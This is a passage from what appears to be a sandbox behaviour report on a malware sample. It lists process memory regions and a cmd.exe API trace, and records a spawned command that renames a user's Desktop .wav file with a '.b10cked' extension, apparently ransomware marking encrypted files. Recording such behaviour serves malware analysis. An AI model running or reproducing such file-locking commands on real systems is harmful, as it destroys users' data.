0xf90fff entry_point = 0xf50000 region_type = mapped_file name = "wmiprvse.exe" filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe") Region: id = 34061 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34062 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34063 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34064 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd3000" filename = "" Region: id = 34065 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34066 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34067 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34068 start_va = 0x160000 end_va = 0x16ffff entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 34069 start_va = 0x330000 end_va = 0x42ffff entry_point = 0x0 region_type = private name = "private_0x0000000000330000" filename = "" Region: id = 34070 start_va = 0x6ebf0000 end_va = 0x6ec07fff entry_point = 0x6ebf0000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 34071 start_va = 0x6ec10000 end_va = 0x6eca5fff entry_point = 0x6ec10000 region_type = mapped_file name = "fastprox.dll" filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll") Region: id = 34072 start_va = 0x6f7c0000 end_va = 0x6f81bfff entry_point = 0x6f7c0000 region_type = mapped_file name = "wbemcomn.dll" filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll") Region: id = 34073 start_va = 0x73d70000 end_va = 0x73d7efff entry_point = 0x73d70000 region_type = mapped_file name = "ncobjapi.dll" filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll") Region: id = 34074 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34075 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 34076 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 34077 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34078 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 34079 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34080 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 34081 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34082 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34083 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 34084 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34085 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 34086 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 34087 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34088 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34089 start_va = 0x230000 end_va = 0x2f7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 34090 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34091 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34102 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 34103 start_va = 0xc0000 end_va = 0x13ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 34104 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 34105 start_va = 0x150000 end_va = 0x156fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 34106 start_va = 0x170000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 34107 start_va = 0x300000 end_va = 0x301fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000300000" filename = "" Region: id = 34108 start_va = 0x430000 end_va = 0x530fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000430000" filename = "" Region: id = 34109 start_va = 0x690000 end_va = 0x6cffff entry_point = 0x0 region_type = private name = "private_0x0000000000690000" filename = "" Region: id = 34110 start_va = 0x6f0000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 34111 start_va = 0x730000 end_va = 0x9fefff entry_point = 0x730000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 34112 start_va = 0xa00000 end_va = 0xdf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a00000" filename = "" Region: id = 34113 start_va = 0x752d0000 end_va = 0x752dbfff entry_point = 0x752d0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 34114 start_va = 0x73c00000 end_va = 0x73c20fff entry_point = 0x73c00000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 34115 start_va = 0x75730000 end_va = 0x75774fff entry_point = 0x75730000 region_type = mapped_file name = "wldap32.dll" filename = "\\Windows\\System32\\Wldap32.dll" (normalized: "c:\\windows\\system32\\wldap32.dll") Region: id = 34146 start_va = 0x310000 end_va = 0x310fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 34147 start_va = 0x320000 end_va = 0x320fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000320000" filename = "" Region: id = 34148 start_va = 0x560000 end_va = 0x59ffff entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 34149 start_va = 0xe80000 end_va = 0xebffff entry_point = 0x0 region_type = private name = "private_0x0000000000e80000" filename = "" Region: id = 34150 start_va = 0xfa0000 end_va = 0x109ffff entry_point = 0x0 region_type = private name = "private_0x0000000000fa0000" filename = "" Region: id = 34151 start_va = 0x75780000 end_va = 0x75802fff entry_point = 0x75780000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 34152 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 34153 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34154 start_va = 0x540000 end_va = 0x540fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 34155 start_va = 0x6ebe0000 end_va = 0x6ebe9fff entry_point = 0x6ebe0000 region_type = mapped_file name = "wbemprox.dll" filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll") Region: id = 34156 start_va = 0x620000 end_va = 0x65ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 34157 start_va = 0x74bf0000 end_va = 0x74c2afff entry_point = 0x74bf0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 34158 start_va = 0x74e50000 end_va = 0x74e65fff entry_point = 0x74e50000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 34159 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 34160 start_va = 0x75370000 end_va = 0x7537dfff entry_point = 0x75370000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 34161 start_va = 0x10c0000 end_va = 0x10fffff entry_point = 0x0 region_type = private name = "private_0x00000000010c0000" filename = "" Region: id = 34162 start_va = 0x1100000 end_va = 0x113ffff entry_point = 0x0 region_type = private name = "private_0x0000000001100000" filename = "" Region: id = 34163 start_va = 0x6ef00000 end_va = 0x6ef0efff entry_point = 0x6ef00000 region_type = mapped_file name = "wbemsvc.dll" filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll") Region: id = 34164 start_va = 0x7ffda000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffda000" filename = "" Region: id = 34165 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 34249 start_va = 0x5e0000 end_va = 0x61ffff entry_point = 0x0 region_type = private name = "private_0x00000000005e0000" filename = "" Region: id = 34250 start_va = 0x6e880000 end_va = 0x6e896fff entry_point = 0x6e880000 region_type = mapped_file name = "wmiutils.dll" filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll") Region: id = 34251 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 34272 start_va = 0x71de0000 end_va = 0x71e07fff entry_point = 0x71de0000 region_type = mapped_file name = "wmiprov.dll" filename = "\\Windows\\System32\\wbem\\wmiprov.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprov.dll") Thread: id = 831 os_tid = 0x354 Thread: id = 834 os_tid = 0x868 Thread: id = 836 os_tid = 0xdf8 Thread: id = 837 os_tid = 0xb7c Thread: id = 838 os_tid = 0xec8 Thread: id = 839 os_tid = 0xadc Thread: id = 840 os_tid = 0x4f4 Thread: id = 843 os_tid = 0x86c Thread: id = 945 os_tid = 0xcec Process: id = "601" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166e0" os_pid = "0x210" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\CII3ZM~1.WAV\" \"C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\cii3Zm5ag7.wav.b10cked\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 34116 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 34117 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 34118 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 34119 start_va = 0x210000 end_va = 0x30ffff entry_point = 0x0 region_type = private name = "private_0x0000000000210000" filename = "" Region: id = 34120 start_va = 0x4a4d0000 end_va = 0x4a51bfff entry_point = 0x4a4d0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 34121 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 34122 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 34123 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 34124 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 34125 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 34215 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 34216 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 34217 start_va = 0x80000 end_va = 0x8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000080000" filename = "" Region: id = 34218 start_va = 0x90000 end_va = 0x18ffff entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 34219 start_va = 0x190000 end_va = 0x1f6fff entry_point = 0x190000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 34220 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 34221 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 34222 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 34223 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 34224 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 34225 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 34226 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 34227 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 34228 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 34229 start_va = 0x310000 end_va = 0x3d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000310000" filename = "" Region: id = 34230 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 34231 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 34232 start_va = 0x50000 end_va = 0x56fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 34233 start_va = 0x60000 end_va = 0x61fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 34234 start_va = 0x70000 end_va = 0x70fff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 34235 start_va = 0x200000 end_va = 0x200fff entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 34236 start_va = 0x3e0000 end_va = 0x4e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003e0000" filename = "" Region: id = 34237 start_va = 0x4f0000 end_va = 0x10effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 34238 start_va = 0x10f0000 end_va = 0x1252fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000010f0000" filename = "" Thread: id = 832 os_tid = 0xf00 [0227.355] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x30ff54 | out: lpSystemTimeAsFileTime=0x30ff54*(dwLowDateTime=0xbb142fa0, dwHighDateTime=0x1d440a9)) [0227.355] GetCurrentProcessId () returned 0x210 [0227.355] GetCurrentThreadId () returned 0xf00 [0227.355] GetTickCount () returned 0x3eb48 [0227.355] QueryPerformanceCounter (in: lpPerformanceCount=0x30ff4c | out: lpPerformanceCount=0x30ff4c*=28414443068) returned 1 [0227.356] GetModuleHandleA (lpModuleName=0x0) returned 0x4a4d0000 [0227.356] __set_app_type (_Type=0x1) [0227.356] __p__fmode () returned 0x76b331f4 [0227.356] __p__commode () returned 0x76b331fc [0227.356] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a4f21a6) returned 0x0 [0227.356] __getmainargs (in: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c, _DoWildCard=0, _StartInfo=0x4a4f4140 | out: _Argc=0x4a4f4238, _Argv=0x4a4f4240, _Env=0x4a4f423c) returned 0 [0227.357] GetCurrentThreadId () returned 0xf00 [0227.357] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xf00) returned 0x38 [0227.357] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0227.357] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0227.357] SetThreadUILanguage (LangId=0x0) returned 0x409 [0227.357] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0227.357] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x30fee4 | out: phkResult=0x30fee4*=0x0) returned 0x2 [0227.357] VirtualQuery (in: lpAddress=0x30ff1b, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x30f000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x210000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x210000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x211000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x211000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x213000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x213000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0227.357] VirtualQuery (in: lpAddress=0x310000, lpBuffer=0x30feb4, dwLength=0x1c | out: lpBuffer=0x30feb4*(BaseAddress=0x310000, AllocationBase=0x310000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0227.357] GetConsoleOutputCP () returned 0x1b5 [0227.357] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a4f4260 | out: lpCPInfo=0x4a4f4260) returned 1 [0227.358] SetConsoleCtrlHandler (HandlerRoutine=0x4a4ee72a, Add=1) returned 1 [0227.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0227.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.358] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a4f41ac | out: lpMode=0x4a4f41ac) returned 1 [0227.358] _get_osfhandle (_FileHandle=1) returned 0x7 [0227.358] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0227.358] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.358] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a4f41b0 | out: lpMode=0x4a4f41b0) returned 1 [0227.359] _get_osfhandle (_FileHandle=0) returned 0x3 [0227.359] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0227.359] GetEnvironmentStringsW () returned 0xa01b0* [0227.359] FreeEnvironmentStringsW (penv=0xa01b0) returned 1 [0227.359] GetEnvironmentStringsW () returned 0xa01b0* [0227.359] FreeEnvironmentStringsW (penv=0xa01b0) returned 1 [0227.359] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee54 | out: phkResult=0x30ee54*=0x40) returned 0x0 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0xe8, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.359] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x0, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegCloseKey (hKey=0x40) returned 0x0 [0227.360] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x30ee54 | out: phkResult=0x30ee54*=0x40) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x40, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x0, lpData=0x30ee60*=0x1, lpcbData=0x30ee58*=0x1000) returned 0x2 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x0, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x9, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x30ee5c, lpData=0x30ee60, lpcbData=0x30ee58*=0x1000 | out: lpType=0x30ee5c*=0x4, lpData=0x30ee60*=0x9, lpcbData=0x30ee58*=0x4) returned 0x0 [0227.360] 